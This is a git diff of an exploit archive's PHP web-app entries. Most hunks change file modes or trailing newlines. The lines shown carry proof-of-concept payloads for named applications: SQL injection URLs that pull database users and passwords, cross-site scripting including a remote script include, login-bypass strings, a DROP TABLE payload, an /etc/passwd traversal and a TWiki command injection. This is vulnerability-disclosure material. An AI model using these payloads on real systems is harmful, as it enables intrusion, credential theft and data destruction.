b/platforms/php/webapps/32541.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc H&H Solutions WebSoccer 2.80 is vulnerable; other versions may also be affected. -http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/* \ No newline at end of file +http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/* \ No newline at end of file diff --git a/platforms/php/webapps/32542.txt b/platforms/php/webapps/32542.txt old mode 100755 new mode 100644 index 6aace43bf..b2622edc7 --- a/platforms/php/webapps/32542.txt +++ b/platforms/php/webapps/32542.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects Elkagroup 1.0; other versions may also be affected. -http://www.example.com/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0 \ No newline at end of file +http://www.example.com/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0 \ No newline at end of file diff --git a/platforms/php/webapps/32543.txt b/platforms/php/webapps/32543.txt old mode 100755 new mode 100644 index 7184e2886..60c53573c --- a/platforms/php/webapps/32543.txt +++ b/platforms/php/webapps/32543.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Kmita Catalogue V2 is vulnerable; other versions may also be affected. -http://www.example.com/search.php?q=<script>alert(document.cookie);</script>&Search=Search \ No newline at end of file +http://www.example.com/search.php?q=<script>alert(document.cookie);</script>&Search=Search \ No newline at end of file diff --git a/platforms/php/webapps/32544.txt b/platforms/php/webapps/32544.txt old mode 100755 new mode 100644 index 9e8a643d0..0ebf80f5d --- a/platforms/php/webapps/32544.txt +++ b/platforms/php/webapps/32544.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/kmitag/index.php?begin=10<script>alert(document.cookie);</script>&catid=3 -http://www.example.com/kmitag/search.php?searchtext=<script>alert(document.cookie);</script>&Search=Search \ No newline at end of file +http://www.example.com/kmitag/search.php?searchtext=<script>alert(document.cookie);</script>&Search=Search \ No newline at end of file diff --git a/platforms/php/webapps/32547.txt b/platforms/php/webapps/32547.txt old mode 100755 new mode 100644 index 7771cc296..86684d878 --- a/platforms/php/webapps/32547.txt +++ b/platforms/php/webapps/32547.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Extrakt Framework 0.7 is vulnerable; other versions may also be affected. -http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=<script>alert(2008);</script> \ No newline at end of file +http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=<script>alert(2008);</script> \ No newline at end of file diff --git a/platforms/php/webapps/3255.php b/platforms/php/webapps/3255.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32553.txt b/platforms/php/webapps/32553.txt old mode 100755 new mode 100644 index a063c4bd8..59454b1bf --- a/platforms/php/webapps/32553.txt +++ b/platforms/php/webapps/32553.txt @@ -8,4 +8,4 @@ We don't know which versions of phpWebSite are affected. We will update this BID NOTE: The vendor refutes this issue, stating that the vulnerable script has not been present in the application since either the 0.8.x or 0.9.x releases. -http://www.example.com/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())-- \ No newline at end of file +http://www.example.com/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())-- \ No newline at end of file diff --git a/platforms/php/webapps/32554.txt b/platforms/php/webapps/32554.txt old mode 100755 new mode 100644 index 24f96ac2e..569f18f9c --- a/platforms/php/webapps/32554.txt +++ b/platforms/php/webapps/32554.txt @@ -4,4 +4,4 @@ SpitFire Photo Pro is prone to an SQL-injection vulnerability because it fails t Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())-- \ No newline at end of file +http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())-- \ No newline at end of file diff --git a/platforms/php/webapps/3256.txt b/platforms/php/webapps/3256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32561.txt b/platforms/php/webapps/32561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32562.txt b/platforms/php/webapps/32562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32563.txt b/platforms/php/webapps/32563.txt old mode 100755 new mode 100644 index 27b577292..b285619e3 --- a/platforms/php/webapps/32563.txt +++ b/platforms/php/webapps/32563.txt @@ -4,4 +4,4 @@ Downline Builder Pro is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- \ No newline at end of file +http://www.example.com/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- \ No newline at end of file diff --git a/platforms/php/webapps/32566.txt b/platforms/php/webapps/32566.txt old mode 100755 new mode 100644 index cd96c1d96..edd090f3a --- a/platforms/php/webapps/32566.txt +++ b/platforms/php/webapps/32566.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow firmCHANNEL Indoor & Outdoor Digital SIGNAGE 3.24 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?module=account&action=login%3Cscript%3Ealert(%27xss%27);%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?module=account&action=login%3Cscript%3Ealert(%27xss%27);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32567.txt b/platforms/php/webapps/32567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32570.txt b/platforms/php/webapps/32570.txt old mode 100755 new mode 100644 index 2d12a8567..c8a3daea9 --- a/platforms/php/webapps/32570.txt +++ b/platforms/php/webapps/32570.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin CuteNews aj-fork 167 final is vulnerable; other versions may also be affected. -http://www.example.com/register.php?config_skin=../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/register.php?config_skin=../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32571.txt b/platforms/php/webapps/32571.txt old mode 100755 new mode 100644 index 5fbdcd770..856a46aff --- a/platforms/php/webapps/32571.txt +++ b/platforms/php/webapps/32571.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Software Directory 1.0 is vulnerable; other versions may also be affected. http://www.example.com/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5-- -http://www.example.com/signinform.php?msg="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/signinform.php?msg="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32575.txt b/platforms/php/webapps/32575.txt old mode 100755 new mode 100644 index fe5763a2a..e93d7a034 --- a/platforms/php/webapps/32575.txt +++ b/platforms/php/webapps/32575.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to gain administrative access to the affected a SHAADICLONE 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/admin/home.php \ No newline at end of file +http://www.example.com/admin/home.php \ No newline at end of file diff --git a/platforms/php/webapps/3258.txt b/platforms/php/webapps/3258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32588.txt b/platforms/php/webapps/32588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32589.html b/platforms/php/webapps/32589.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32592.txt b/platforms/php/webapps/32592.txt old mode 100755 new mode 100644 index a3afcc201..e129676bc --- a/platforms/php/webapps/32592.txt +++ b/platforms/php/webapps/32592.txt @@ -4,4 +4,4 @@ Easyedit is prone to multiple SQL-injection vulnerabilities because it fails to Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/subcategory.php?intSubCategoryID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- \ No newline at end of file +http://www.example.com/subcategory.php?intSubCategoryID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- \ No newline at end of file diff --git a/platforms/php/webapps/32593.txt b/platforms/php/webapps/32593.txt old mode 100755 new mode 100644 index 31d142ac5..2dae4dcb5 --- a/platforms/php/webapps/32593.txt +++ b/platforms/php/webapps/32593.txt @@ -4,4 +4,4 @@ Easyedit is prone to multiple SQL-injection vulnerabilities because it fails to Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/page.php?intPageID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- \ No newline at end of file +http://www.example.com/page.php?intPageID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- \ No newline at end of file diff --git a/platforms/php/webapps/32594.txt b/platforms/php/webapps/32594.txt old mode 100755 new mode 100644 index d04e00b86..d902f00de --- a/platforms/php/webapps/32594.txt +++ b/platforms/php/webapps/32594.txt @@ -4,4 +4,4 @@ Easyedit is prone to multiple SQL-injection vulnerabilities because it fails to Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/news.php?intPageID=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())-- \ No newline at end of file +http://www.example.com/news.php?intPageID=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())-- \ No newline at end of file diff --git a/platforms/php/webapps/32595.txt b/platforms/php/webapps/32595.txt old mode 100755 new mode 100644 index 291690d97..457b6ea1f --- a/platforms/php/webapps/32595.txt +++ b/platforms/php/webapps/32595.txt @@ -4,4 +4,4 @@ Softbiz Classifieds Script is prone to a cross-site scripting vulnerability beca An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/signinform.php?msg=Hacked%20By%20Vahid%20Ezraeil%20At%20North% \ No newline at end of file +http://www.example.com/signinform.php?msg=Hacked%20By%20Vahid%20Ezraeil%20At%20North% \ No newline at end of file diff --git a/platforms/php/webapps/32597.txt b/platforms/php/webapps/32597.txt old mode 100755 new mode 100644 index 24583451e..85988437c --- a/platforms/php/webapps/32597.txt +++ b/platforms/php/webapps/32597.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following proof of concept is available: username: admin ' or ' 1=1-- -password: anything \ No newline at end of file +password: anything \ No newline at end of file diff --git a/platforms/php/webapps/32598.txt b/platforms/php/webapps/32598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32600.txt b/platforms/php/webapps/32600.txt old mode 100755 new mode 100644 index 04ed8e279..a5bee6767 --- a/platforms/php/webapps/32600.txt +++ b/platforms/php/webapps/32600.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ACID 1.4.4 is vulnerable; other versions may also be affected. -http://www.example.com/[acid_path]/index.php?p=search&menu=[XSS] \ No newline at end of file +http://www.example.com/[acid_path]/index.php?p=search&menu=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32605.txt b/platforms/php/webapps/32605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32606.txt b/platforms/php/webapps/32606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32607.txt b/platforms/php/webapps/32607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32608.txt b/platforms/php/webapps/32608.txt old mode 100755 new mode 100644 index 5025cb2df..0f4c770bb --- a/platforms/php/webapps/32608.txt +++ b/platforms/php/webapps/32608.txt @@ -4,4 +4,4 @@ RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities. Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database. -Set Cookie: PHPSESSID=' \ No newline at end of file +Set Cookie: PHPSESSID=' \ No newline at end of file diff --git a/platforms/php/webapps/3261.txt b/platforms/php/webapps/3261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32612.txt b/platforms/php/webapps/32612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32613.txt b/platforms/php/webapps/32613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32614.txt b/platforms/php/webapps/32614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32615.txt b/platforms/php/webapps/32615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32616.txt b/platforms/php/webapps/32616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32617.txt b/platforms/php/webapps/32617.txt old mode 100755 new mode 100644 index 9312a139f..d79570eef --- a/platforms/php/webapps/32617.txt +++ b/platforms/php/webapps/32617.txt @@ -4,4 +4,4 @@ Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabili An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/admin/index.php?msg=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt \ No newline at end of file +http://www.example.com/admin/index.php?msg=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt \ No newline at end of file diff --git a/platforms/php/webapps/3262.php b/platforms/php/webapps/3262.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32622.txt b/platforms/php/webapps/32622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32624.txt b/platforms/php/webapps/32624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32625.txt b/platforms/php/webapps/32625.txt old mode 100755 new mode 100644 index a99dad895..9a09b88c1 --- a/platforms/php/webapps/32625.txt +++ b/platforms/php/webapps/32625.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica http://www.example.com/[Path]/siteadmin/forgot.php -UserName:<script>alert(1369)</script> \ No newline at end of file +UserName:<script>alert(1369)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32627.txt b/platforms/php/webapps/32627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3263.txt b/platforms/php/webapps/3263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32632.php b/platforms/php/webapps/32632.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32633.txt b/platforms/php/webapps/32633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32634.txt b/platforms/php/webapps/32634.txt old mode 100755 new mode 100644 index 376fe3171..31d9fb042 --- a/platforms/php/webapps/32634.txt +++ b/platforms/php/webapps/32634.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Z1Exchange 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/[Path]/showads.php?id=<script>alert(1369)</script> \ No newline at end of file +http://www.example.com/[Path]/showads.php?id=<script>alert(1369)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32636.txt b/platforms/php/webapps/32636.txt old mode 100755 new mode 100644 index 8a2f28b24..d00b2732b --- a/platforms/php/webapps/32636.txt +++ b/platforms/php/webapps/32636.txt @@ -4,4 +4,4 @@ Orkut Clone is prone to an SQL-injection vulnerability and a cross-site scriptin Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/orkutclone/profile_social.php?id=[sql query] \ No newline at end of file +http://www.example.com/orkutclone/profile_social.php?id=[sql query] \ No newline at end of file diff --git a/platforms/php/webapps/32637.txt b/platforms/php/webapps/32637.txt old mode 100755 new mode 100644 index ec25276ad..66ead756f --- a/platforms/php/webapps/32637.txt +++ b/platforms/php/webapps/32637.txt @@ -4,4 +4,4 @@ Orkut Clone is prone to an SQL-injection vulnerability and a cross-site scriptin Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E \ No newline at end of file +http://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/32638.txt b/platforms/php/webapps/32638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32639.txt b/platforms/php/webapps/32639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32640.txt b/platforms/php/webapps/32640.txt old mode 100755 new mode 100644 index 9ca0fae8d..85c9aba5f --- a/platforms/php/webapps/32640.txt +++ b/platforms/php/webapps/32640.txt @@ -4,4 +4,4 @@ The 'yappa-ng' program is prone to multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/[Path]/?>"'><ScRiPt>alert(1369)</ScRiPt> \ No newline at end of file +http://www.example.com/[Path]/?>"'><ScRiPt>alert(1369)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/32641.txt b/platforms/php/webapps/32641.txt old mode 100755 new mode 100644 index 05ba1b405..f57624807 --- a/platforms/php/webapps/32641.txt +++ b/platforms/php/webapps/32641.txt @@ -8,4 +8,4 @@ RevSense 1.0 is vulnerable; other versions may also be affected. http://www.example.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"&section=user&action=login http://www.example.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya -http://www.example.com/index.php?section=<script>alert(1369)</script>&action=login \ No newline at end of file +http://www.example.com/index.php?section=<script>alert(1369)</script>&action=login \ No newline at end of file diff --git a/platforms/php/webapps/32642.txt b/platforms/php/webapps/32642.txt old mode 100755 new mode 100644 index a8588e97a..fee6a7f2d --- a/platforms/php/webapps/32642.txt +++ b/platforms/php/webapps/32642.txt @@ -4,4 +4,4 @@ PHPSTREET Webboard is prone to an SQL-injection vulnerability because it fails t Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user \ No newline at end of file +http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user \ No newline at end of file diff --git a/platforms/php/webapps/32644.txt b/platforms/php/webapps/32644.txt old mode 100755 new mode 100644 index c84f3822c..457e7acbf --- a/platforms/php/webapps/32644.txt +++ b/platforms/php/webapps/32644.txt @@ -193,4 +193,4 @@ avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false -msf auxiliary(alienvault_isp27001_sqli) > \ No newline at end of file +msf auxiliary(alienvault_isp27001_sqli) > \ No newline at end of file diff --git a/platforms/php/webapps/32645.txt b/platforms/php/webapps/32645.txt old mode 100755 new mode 100644 index 689d347f8..def527fa3 --- a/platforms/php/webapps/32645.txt +++ b/platforms/php/webapps/32645.txt @@ -7,4 +7,4 @@ Successful attacks can compromise the affected application and possibly the unde Enter the following in the application's search box: %SEARCH{ date="P`pr -?`" search="xyzzy" }% -http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all \ No newline at end of file +http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all \ No newline at end of file diff --git a/platforms/php/webapps/32646.txt b/platforms/php/webapps/32646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32647.txt b/platforms/php/webapps/32647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32648.txt b/platforms/php/webapps/32648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32649.txt b/platforms/php/webapps/32649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32650.txt b/platforms/php/webapps/32650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32651.txt b/platforms/php/webapps/32651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32652.txt b/platforms/php/webapps/32652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32656.txt b/platforms/php/webapps/32656.txt old mode 100755 new mode 100644 index f5d93cc7a..e31f6dc6d --- a/platforms/php/webapps/32656.txt +++ b/platforms/php/webapps/32656.txt @@ -9,4 +9,4 @@ Octeth Oempro 3.5.5.1 is vulnerable; other versions may also be affected. The following example input data is available: Email: ' or 0=0 # -Password: password \ No newline at end of file +Password: password \ No newline at end of file diff --git a/platforms/php/webapps/3266.txt b/platforms/php/webapps/3266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32663.txt b/platforms/php/webapps/32663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32665.txt b/platforms/php/webapps/32665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32666.txt b/platforms/php/webapps/32666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32668.txt b/platforms/php/webapps/32668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32669.txt b/platforms/php/webapps/32669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3267.txt b/platforms/php/webapps/3267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32670.txt b/platforms/php/webapps/32670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32671.txt b/platforms/php/webapps/32671.txt old mode 100755 new mode 100644 index 809b7cd4c..dc12cedf9 --- a/platforms/php/webapps/32671.txt +++ b/platforms/php/webapps/32671.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a DO-CMS 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?p=%28SQL%29 \ No newline at end of file +http://www.example.com/index.php?p=%28SQL%29 \ No newline at end of file diff --git a/platforms/php/webapps/32672.txt b/platforms/php/webapps/32672.txt old mode 100755 new mode 100644 index dd459ab60..fd253151b --- a/platforms/php/webapps/32672.txt +++ b/platforms/php/webapps/32672.txt @@ -4,4 +4,4 @@ EasySiteNetwork Jokes Complete Website is prone to an SQL-injection vulnerabilit Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login-- \ No newline at end of file +http://www.example.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login-- \ No newline at end of file diff --git a/platforms/php/webapps/32676.txt b/platforms/php/webapps/32676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3268.txt b/platforms/php/webapps/3268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32685.txt b/platforms/php/webapps/32685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32689.txt b/platforms/php/webapps/32689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32698.txt b/platforms/php/webapps/32698.txt old mode 100755 new mode 100644 index 5882d29ce..7cbd82e16 --- a/platforms/php/webapps/32698.txt +++ b/platforms/php/webapps/32698.txt @@ -4,4 +4,4 @@ SolucionXpressPro is prone to an SQL-injection vulnerability because it fails to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/main.php?id_area=[SQL] \ No newline at end of file +http://www.example.com/main.php?id_area=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/32701.txt b/platforms/php/webapps/32701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3271.php b/platforms/php/webapps/3271.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32713.txt b/platforms/php/webapps/32713.txt old mode 100755 new mode 100644 index 7e443f691..5594c8c6b --- a/platforms/php/webapps/32713.txt +++ b/platforms/php/webapps/32713.txt @@ -9,4 +9,4 @@ http://www.example.com/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/sel http://www.example.com/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/* -http://www.example.com/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/* \ No newline at end of file +http://www.example.com/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/* \ No newline at end of file diff --git a/platforms/php/webapps/32714.txt b/platforms/php/webapps/32714.txt old mode 100755 new mode 100644 index 91e63a678..0dc3a09ab --- a/platforms/php/webapps/32714.txt +++ b/platforms/php/webapps/32714.txt @@ -4,4 +4,4 @@ Visuplay CMS is prone to multiple SQL-injection vulnerabilities because it fails Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7 \ No newline at end of file +http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7 \ No newline at end of file diff --git a/platforms/php/webapps/32718.txt b/platforms/php/webapps/32718.txt old mode 100755 new mode 100644 index 59fedf07a..095082338 --- a/platforms/php/webapps/32718.txt +++ b/platforms/php/webapps/32718.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/index.php?tg=search&pat=%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E -http://www.example.com/index.php?tg=oml&file=download.html&smap_node_id==%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?tg=oml&file=download.html&smap_node_id==%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32721.txt b/platforms/php/webapps/32721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32724.txt b/platforms/php/webapps/32724.txt old mode 100755 new mode 100644 index 3a27a9c72..8c48efbf5 --- a/platforms/php/webapps/32724.txt +++ b/platforms/php/webapps/32724.txt @@ -9,4 +9,4 @@ Dark Age CMS 0.2c beta is vulnerable; other versions may also be affected. The following example data is available: Username: x' OR 'x' = 'x'# -Password: anything \ No newline at end of file +Password: anything \ No newline at end of file diff --git a/platforms/php/webapps/32727.txt b/platforms/php/webapps/32727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32728.txt b/platforms/php/webapps/32728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32732.txt b/platforms/php/webapps/32732.txt old mode 100755 new mode 100644 index 1330c25e0..6aaf6bc4c --- a/platforms/php/webapps/32732.txt +++ b/platforms/php/webapps/32732.txt @@ -4,4 +4,4 @@ Masir Camp is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/?Culture=fa-IR&page=search&SearchKeywords=[SQL] \ No newline at end of file +http://www.example.com/?Culture=fa-IR&page=search&SearchKeywords=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/32733.txt b/platforms/php/webapps/32733.txt old mode 100755 new mode 100644 index b34dde5ff..37511065b --- a/platforms/php/webapps/32733.txt +++ b/platforms/php/webapps/32733.txt @@ -4,4 +4,4 @@ The 'w3bcms' application is prone to an SQL-injection vulnerability because it f Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/index.php?seite=20%2Egaestebuch&action=[SQL]&id=1 \ No newline at end of file +http://www.example.com/[Path]/index.php?seite=20%2Egaestebuch&action=[SQL]&id=1 \ No newline at end of file diff --git a/platforms/php/webapps/32747.txt b/platforms/php/webapps/32747.txt old mode 100755 new mode 100644 index 81862f94f..a6286bfa5 --- a/platforms/php/webapps/32747.txt +++ b/platforms/php/webapps/32747.txt @@ -18,4 +18,4 @@ sername+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* Users Password : http://www.example.com/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+u -ser_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* \ No newline at end of file +ser_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* \ No newline at end of file diff --git a/platforms/php/webapps/3275.txt b/platforms/php/webapps/3275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32757.txt b/platforms/php/webapps/32757.txt old mode 100755 new mode 100644 index 60965d605..633005541 --- a/platforms/php/webapps/32757.txt +++ b/platforms/php/webapps/32757.txt @@ -10,4 +10,4 @@ An attacker can exploit these issues to execute arbitrary script code within the ConPresso CMS 4.07 is vulnerable; other versions may also be affected. -http://www.example.com/conpresso407/_manual/index.php?ref=http://www.example.com \ No newline at end of file 